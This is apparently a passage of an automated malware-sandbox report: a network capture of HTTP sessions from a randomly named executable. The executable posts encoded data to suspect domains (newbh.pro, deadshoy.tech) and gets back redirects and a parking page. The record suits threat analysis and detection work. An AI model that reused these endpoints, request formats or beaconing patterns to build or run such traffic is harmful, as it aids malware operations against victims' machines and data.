72 52 32 4d 6e 75 5a 52 33 32 52 71 6e Data Ascii: 5t=pBM0ElNuzp5D5KLwfplYy22nqpPcAnM27cRgbmsEl4+yn6VkMifrEVAXr4yePHVASRWGlIKCjDQGKoLxUGLsam1LJF7yfL0qo7gSwID8GhVqxy4/oT+Iez3gZItGutr3aqybHsLIk2aeseShVVcP9gojT1HeXr/DLwjOx/XgLcb1Jmc4C6b4i5/yJp679hXtyuRhWE2eDGxntnOrR2MnuZR32Rqn
Jan 11, 2025 05:35:42.276772022 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=DNjtFoym2BpApb7i; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:42 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:42 GMT Set-Cookie: __ddg10_=1736570142; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:42 GMT Set-Cookie: __ddg1_=tvQjt0r3EryosoaoEcvt; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:35:42 GMT date: Sat, 11 Jan 2025 04:35:42 GMT content-type: text/html; charset=iso-8859-1 content-length: 431 location: https://www.newbh.pro/67jc/?n03=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7zp8UXbla9DQDRTX/tvbK76/&RvRxJ=wb-xfvhP x-host: www.newbh.pro x-tilda-server: 27 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 6e 30 33 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 61 73 6c 34 33 33 50 43 68 71 6a 63 56 45 4d 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 43 45 32 6c 51 6a 59 4c 65 49 56 52 50 59 31 57 54 69 72 65 4b 68 67 35 6b 49 49 4c 6c 44 68 6a 6d 61 55 45 58 49 30 44 31 56 72 73 6f 2b 38 56 32 38 63 33 68 50 55 74 48 6b 43 35 6c 68 32 4b 69 53 79 2b 2b 66 71 42 35 39 2b 37 66 63 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?n03=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7zp8UXbl
Jan 11, 2025 05:35:42.276788950 CET	66	IN	Data Raw: 61 39 44 51 44 52 54 58 2f 74 76 62 4b 37 36 2f 26 61 6d 70 3b 52 76 52 78 4a 3d 77 62 2d 78 66 76 68 50 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: a9DQDRTX/tvbK76/&RvRxJ=wb-xfvhP">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	176.57.65.76	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:44.175172091 CET	1819	OUT	POST /67jc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/67jc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 35 4b 4c 77 66 70 6c 59 79 32 32 6e 71 70 50 63 41 6e 4d 32 37 63 52 67 62 6d 73 45 6c 35 71 79 6e 73 4a 6b 50 41 33 72 46 56 41 58 31 49 79 66 50 48 56 52 53 58 2b 61 6c 49 57 30 6a 41 34 47 4c 4e 48 78 44 69 6e 73 51 6d 31 4c 4c 46 37 7a 52 72 30 7a 6f 37 78 36 77 4d 6e 38 47 68 56 71 78 31 41 2f 68 6d 4b 49 53 54 33 68 59 49 74 4b 71 74 72 54 61 73 61 4c 48 73 66 48 6b 48 36 65 69 66 2b 68 58 6e 30 50 2b 41 6f 68 55 31 47 44 58 72 37 59 4c 77 2f 6b 78 2f 54 61 4c 62 76 31 4c 6d 51 6d 61 65 62 34 31 36 69 41 47 59 54 66 34 57 7a 37 73 4f 4a 72 54 6b 32 67 55 42 4e 51 6a 48 65 65 59 6c 68 52 77 50 59 69 78 6e 4c 2f 48 42 50 44 76 49 79 4f 72 6b 6d 6f 36 75 70 53 34 54 59 6e 75 4a 55 76 4f 68 46 46 5a 6e 73 32 4c 37 2f 53 6f 49 6c 35 4e 44 30 44 45 54 34 55 31 77 37 32 6a 6c 55 78 63 66 37 75 61 78 63 41 30 49 72 52 46 6c 76 45 39 43 56 62 4b 64 78 38 6f 6b 7a 55 62 49 59 44 42 6f 66 48 4f 4b 52 74 36 6f 77 2b 68 51 45 58 46 50 78 48 4d 4a 4a 67 62 67 69 [TRUNCATED] Data Ascii: 5t=pBM0ElNuzp5D5KLwfplYy22nqpPcAnM27cRgbmsEl5qynsJkPA3rFVAX1IyfPHVRSX+alIW0jA4GLNHxDinsQm1LLF7zRr0zo7x6wMn8GhVqx1A/hmKIST3hYItKqtrTasaLHsfHkH6eif+hXn0P+AohU1GDXr7YLw/kx/TaLbv1LmQmaeb416iAGYTf4Wz7sOJrTk2gUBNQjHeeYlhRwPYixnL/HBPDvIyOrkmo6upS4TYnuJUvOhFFZns2L7/SoIl5ND0DET4U1w72jlUxcf7uaxcA0IrRFlvE9CVbKdx8okzUbIYDBofHOKRt6ow+hQEXFPxHMJJgbgiMry4JhHAnROiwgoD5ORqVjL7uUscQ1I5BxcQjexZ8UXclx8SbO7/OKjTwk5MisbDg4b7ZoX4R4pZ7iJ7e74FcDGswCE1t5QTnEL7w4WpQVwyjcQJ++IivnpsnkEDUx5dcwH1wAODCmMEdxN+ksRlBtVghpCwQAKkICNnHZreZilrXOyM2MFAw9+H8Ic+u+i4D7orkWuQw/THYkWCQ7UYOXXpocriHM4ECnNOhbp3cZlzY2dZsueAqYzNRUxvskeEMBA+ncV4z2qrlxgG8J3fV93pD/sYFC6jsI/lJizb6mP0XHnZ7LoJ25mLbcRgmNGZKIcKOUXUT/QgGvowUU+iCTQztBqwr519H4rI8t702YK0IjSuOopSupz/VyvT/Cg+3PkjN5XlnnG722H1Pi32tuBafJuWWQWl/kEOcbgfUuEJpln0p9sl4RwOEar97BOHxNLxLrH4lUh/JjAYVerA+lgBRbd4LpBK9TyaZN3QE5cLD6k0l4rPZtGeVNfSnL4K7KTd6VhDNbFCc17O6uSIaTTrVWIN9xVuo9SHo8DpUDOrQv/eLspimJ4RB/qMgGxE3VyFYVRTzb42ghpKqU63Yvs7N1DP6zVVa+0QMWsdZpviWcQ0xLE2iyljCmin+NBEVSSMqol9R1hZfb3RcafA+Rr3q+AVwJC693 [TRUNCATED]
Jan 11, 2025 05:35:44.941660881 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=WADFaUsGmQH5rVod; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:44 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:44 GMT Set-Cookie: __ddg10_=1736570144; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:44 GMT Set-Cookie: __ddg1_=enKuwosQFERApQKVgUvU; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:35:44 GMT date: Sat, 11 Jan 2025 04:35:44 GMT content-type: text/html; charset=iso-8859-1 content-length: 397 location: https://www.newbh.pro/67jc/?g2V6RQ=kDkUHRN5t7dj/L6pbYtXinLd6bfODVMZ28RJcX0ruebcxps2UknIHDIRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfoPWFFmRUsoXyrHju8fZY++tHlaKveA/Dc6mrH&Dlp=xkAs2 x-ws-id: 2 x-host: www.newbh.pro x-tilda-server: 26 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 67 32 56 36 52 51 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 62 59 74 58 69 6e 4c 64 36 62 66 4f 44 56 4d 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 49 48 44 49 52 70 6f 36 53 50 6e 35 63 59 77 75 58 68 65 36 34 38 51 31 6c 49 63 72 71 56 67 33 72 58 33 67 54 46 30 65 64 53 4b 30 37 30 5a 74 50 37 72 66 6f 50 57 46 46 6d 52 55 73 6f 58 79 72 48 6a 75 38 66 5a 59 2b 2b 74 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?g2V6RQ=kDkUHRN5t7dj/L6pbYtXinLd6bfODVMZ28RJcX0ruebcxps2UknIHDIRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfoPWFFmRUsoXyrHju8fZY++tHlaKveA/Dc6mrH&Dlp=xkAs2">here</a>.</p></bod
Jan 11, 2025 05:35:44.941674948 CET	10	IN	Data Raw: 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: y></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49717	176.57.65.76	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:46.716240883 CET	541	OUT	GET /67jc/?5t=kDkUHRN5t7dj/L6paso6inXd6eXYDn0Z28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rU30TGEOcT5RW1p1cw9XoFAJbkTUsrX+CZQm6ftBIq+2JBw==&HBa8C=1TmdP6ixExB8DV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.newbh.pro User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:35:47.375411034 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=qDZZiTuco93twIyO; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:47 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:47 GMT Set-Cookie: __ddg10_=1736570147; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:47 GMT Set-Cookie: __ddg1_=z252lmV88qqwJhGh6nmi; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:35:47 GMT date: Sat, 11 Jan 2025 04:35:47 GMT content-type: text/html; charset=iso-8859-1 content-length: 434 location: https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7zp8UXbla9DQDRTX/tvbK76/&Ay2=aOpadip2p x-host: www.newbh.pro x-tilda-server: 30 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 32 58 50 44 31 58 61 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 61 73 6c 34 33 33 50 43 68 71 6a 63 56 45 4d 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 43 45 32 6c 51 6a 59 4c 65 49 56 52 50 59 31 57 54 69 72 65 4b 68 67 35 6b 49 49 4c 6c 44 68 6a 6d 61 55 45 58 49 30 44 31 56 72 73 6f 2b 38 56 32 38 63 33 68 50 55 74 48 6b 43 35 6c 68 32 4b 69 53 79 2b 2b 66 71 42 35 39 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRPY1WTireKhg5kIILlDhjmaUEXI0D1Vrso+8V28c3hPUtHkC5lh2KiSy++fqB59+7fcLbeJd3WhECfuZqTZWVy7
Jan 11, 2025 05:35:47.375422955 CET	72	IN	Data Raw: 7a 70 38 55 58 62 6c 61 39 44 51 44 52 54 58 2f 74 76 62 4b 37 36 2f 26 61 6d 70 3b 41 79 32 3d 61 4f 70 61 64 69 70 32 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: zp8UXbla9DQDRTX/tvbK76/&Ay2=aOpadip2p">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49718	199.59.243.228	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:52.540749073 CET	794	OUT	POST /k45z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.deadshoy.tech Origin: http://www.deadshoy.tech Referer: http://www.deadshoy.tech/k45z/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 4b 6a 48 56 4c 33 65 45 6c 66 44 53 30 6c 69 37 45 41 6f 4b 67 63 57 4e 35 6d 4b 70 6a 74 7a 52 64 32 48 6b 48 64 36 48 38 50 47 42 43 55 79 34 67 65 39 41 71 7a 6a 46 35 32 65 74 4e 72 77 69 45 68 75 62 7a 59 6a 44 6d 7a 54 4a 4d 49 69 6f 71 5a 52 79 68 65 63 4b 49 66 2f 67 78 4b 78 36 72 57 6b 79 55 70 73 6d 45 5a 47 68 54 46 4b 69 77 48 4b 39 58 52 77 52 68 38 4b 39 47 4c 6e 5a 78 37 41 78 62 31 35 2f 65 68 4c 7a 69 54 56 39 45 34 31 61 71 77 59 64 65 45 52 51 75 42 44 53 78 37 70 2f 68 35 79 6d 7a 67 67 66 64 44 64 73 4b 2b 7a 35 75 49 70 33 71 77 69 32 4d 2b 2f 55 75 41 55 53 46 66 77 3d Data Ascii: 5t=KjHVL3eElfDS0li7EAoKgcWN5mKpjtzRd2HkHd6H8PGBCUy4ge9AqzjF52etNrwiEhubzYjDmzTJMIioqZRyhecKIf/gxKx6rWkyUpsmEZGhTFKiwHK9XRwRh8K9GLnZx7Axb15/ehLziTV9E41aqwYdeERQuBDSx7p/h5ymzggfdDdsK+z5uIp3qwi2M+/UuAUSFfw=
Jan 11, 2025 05:35:52.987767935 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:35:52 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 946d19f1-26a2-4ab0-bb00-d942b75e0079 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig== set-cookie: parking_session=946d19f1-26a2-4ab0-bb00-d942b75e0079; expires=Sat, 11 Jan 2025 04:50:52 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 74 65 32 7a 37 74 43 72 6c 7a 46 58 43 69 67 66 6f 74 34 77 6a 41 41 64 77 4c 2f 6f 70 31 76 30 45 6f 54 42 43 70 6a 45 46 53 30 38 35 72 2b 38 36 7a 44 68 6f 4c 6e 76 7a 2b 46 61 4d 58 61 65 63 65 6e 62 65 47 49 76 6b 77 32 64 33 77 71 39 2f 46 42 69 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:35:52.987782955 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTQ2ZDE5ZjEtMjZhMi00YWIwLWJiMDAtZDk0MmI3NWUwMDc5IiwicGFnZV90aW1lIjoxNzM2NTcwMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49720	199.59.243.228	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:55.095221043 CET	814	OUT	POST /k45z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.deadshoy.tech Origin: http://www.deadshoy.tech Referer: http://www.deadshoy.tech/k45z/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 4b 6a 48 56 4c 33 65 45 6c 66 44 53 32 47 36 37 43 6a 77 4b 73 73 57 4d 6c 32 4b 70 36 39 7a 56 64 32 62 6b 48 63 2b 58 38 38 69 42 46 30 43 34 68 66 39 41 74 7a 6a 46 78 57 65 69 54 62 77 54 45 68 71 31 7a 59 50 44 6d 7a 48 4a 4d 4a 53 6f 70 71 35 31 67 4f 63 55 52 76 2f 69 2f 71 78 36 72 57 6b 79 55 74 38 41 45 61 32 68 54 31 36 69 32 6a 2b 36 61 78 77 51 6f 63 4b 39 43 4c 6e 64 78 37 41 66 62 78 35 56 65 6a 44 7a 69 57 78 39 45 73 5a 5a 7a 41 59 62 64 30 51 4f 70 67 75 57 31 73 78 73 71 37 65 37 73 77 67 43 63 31 73 47 51 63 37 2f 74 49 42 63 71 7a 4b 41 4a 4a 69 38 30 6a 45 69 62 49 6e 56 64 55 6f 69 62 4d 6b 53 54 4d 37 4c 31 76 73 4a 54 32 53 46 Data Ascii: 5t=KjHVL3eElfDS2G67CjwKssWMl2Kp69zVd2bkHc+X88iBF0C4hf9AtzjFxWeiTbwTEhq1zYPDmzHJMJSopq51gOcURv/i/qx6rWkyUt8AEa2hT16i2j+6axwQocK9CLndx7Afbx5VejDziWx9EsZZzAYbd0QOpguW1sxsq7e7swgCc1sGQc7/tIBcqzKAJJi80jEibInVdUoibMkSTM7L1vsJT2SF
Jan 11, 2025 05:35:55.549770117 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:35:54 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 85187c76-2f2a-4aff-afff-55de0b98236d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig== set-cookie: parking_session=85187c76-2f2a-4aff-afff-55de0b98236d; expires=Sat, 11 Jan 2025 04:50:55 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 74 65 32 7a 37 74 43 72 6c 7a 46 58 43 69 67 66 6f 74 34 77 6a 41 41 64 77 4c 2f 6f 70 31 76 30 45 6f 54 42 43 70 6a 45 46 53 30 38 35 72 2b 38 36 7a 44 68 6f 4c 6e 76 7a 2b 46 61 4d 58 61 65 63 65 6e 62 65 47 49 76 6b 77 32 64 33 77 71 39 2f 46 42 69 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
